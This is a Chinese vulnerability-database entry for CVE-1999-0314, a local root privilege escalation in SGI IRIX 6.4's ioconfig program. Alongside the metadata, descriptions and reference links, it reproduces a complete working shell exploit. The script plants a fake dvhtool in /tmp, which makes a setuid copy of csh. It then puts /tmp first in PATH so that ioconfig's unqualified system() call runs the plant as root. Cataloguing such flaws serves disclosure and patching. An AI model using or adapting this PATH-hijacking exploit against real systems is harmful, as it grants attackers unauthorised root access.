IRIX ioconfig漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105374 漏洞类型 其他
发布时间 1998-07-20 更新时间 2006-11-16
CVE编号 CVE-1999-0314 CNNVD-ID CNNVD-199807-003
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19163
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199807-003
|漏洞详情
Origin/Onyx2中SGIIRIX6.4S2M的ioconfig存在漏洞,本地用户利用该漏洞使用相对路径名获取根访问的权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/213/info

A vulnerability exists in the ioconfig program, as shipping with IRIX 6.4 S2MP from Silicon Graphics, Inc. This program is only available on Irix 6.4 for the Origin/Onyx2. Other machines running IRIX are not vulnerable.

This vulnerability will allow a local user to obtain root priveledges. The ioconfig program will make calls to the system() call without setting the path to be used; this allows an attacker to alter their path to cause ioconfig to execute arbitrary programs. 

#!/bin/sh
#
# Irix 6.4 ioconfig xploit - Loneguard 04/12/97
#
# Simple xploit making use of stupid system calls to programs without using
# a path. This works on both /sbin/ioconfig and /sbin/disk_bandwidth.
#
cat > /tmp/dvhtool << 'EOF'
#!/bin/sh
/sbin/cp /bin/csh /tmp/xsh
/sbin/chmod 14755 /tmp/xsh
EOF
/sbin/chmod 700 /tmp/dvhtool
PATH=/tmp:$PATH
/sbin/ioconfig -f /hw
|参考资料

来源:XF
名称:sgi-ioconfig(1199)
链接:http://xforce.iss.net/xforce/xfdb/1199
来源:www.securityfocus.com
链接:http://www.securityfocus.com/bid/213/exploit
来源:BID
名称:213
链接:http://www.securityfocus.com/bid/213
来源:OSVDB
名称:6788
链接:http://www.osvdb.org/6788
来源:SGI
名称:19980701-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/19980701-01-P